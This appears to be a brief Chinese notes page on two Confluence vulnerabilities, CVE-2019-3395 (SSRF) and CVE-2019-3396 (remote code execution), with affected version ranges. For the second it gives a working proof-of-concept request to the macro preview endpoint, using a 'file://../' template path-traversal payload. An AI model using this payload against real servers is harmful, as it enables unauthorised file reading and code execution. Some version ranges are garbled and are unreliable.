CVE-2019-3395

Date:

--

类型:

SSRF



影响范围:
  • Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
  • Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
  • Confluence 6.6.* < 6.6.12
  • Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
  • Confluence 6.12.* < 6.12.3
  • Confluence 6.13.* < 6.13.3
  • Confluence 6.14.* < 6.14.2

CVE-2019-3396

Date:

--

类型:

远程代码执行

复现
POC
/rest/tinymce/1/macro/preview
{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","width":"300","height":"200","_template":"file://../"}}}

影响范围:
  • Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
  • Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
  • Confluence 6.6.* < 6.6.12
  • Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
  • Confluence 6.12.* < 6.12.3
  • Confluence 6.13.* < 6.13.3
  • Confluence 6.14.* < 6.14.2

最新文章

  1. Windows下Nginx配置SSL实现Https访问(包含证书生成)
  2. webhdfs 使用shell下载文件
  3. Oracle以及SDE维护常用命令-查看表空间等
  4. springmvc之图片上传
  5. ubuntu 安装Firefox 29.0
  6. 惩罚因子(penalty term)与损失函数(loss function)
  7. Anywhere服务建立及连接步骤
  8. Installation of Theano on Windows
  9. 将Tab栏居中的方法
  10. PhpCms_V9笔记
  11. Python笔记2.1
  12. 使用mysql5.7新特性(虚拟列)解决使用前通配符性能问题
  13. 【图文详解】Hadoop集群搭建(CentOs6.3)
  14. Go之运算符
  15. 关于Eclipse导入项目jsp出现红色叉的解决办法
  16. Java Web(三) 会话机制,Cookie和Session详解(转载)
  17. Vue笔记:生命周期和钩子函数
  18. [转]Hadoop参数汇总
  19. 软件开发模式,DevOps
  20. 20155316 2016-2017-2 《Java程序设计》第5周学习总结

热门文章

  1. 字典树——动态&amp;&amp;静态
  2. Prism MVVM使用WPF的DataGrid控件
  3. CentOS源码编译安装MySQL 5.5.15
  4. 怎样将shp文件的坐标点导出来?
  5. GO语言学习笔记5-defer的使用
  6. 12.python csv文件写入和读出
  7. 16. ClustrixDB Rebalancer
  8. Python3 操作mysql数据库
  9. Python 爬虫十六式 - 第二式:urllib 与 urllib3
  10. (76)深入浅出Mqtt协议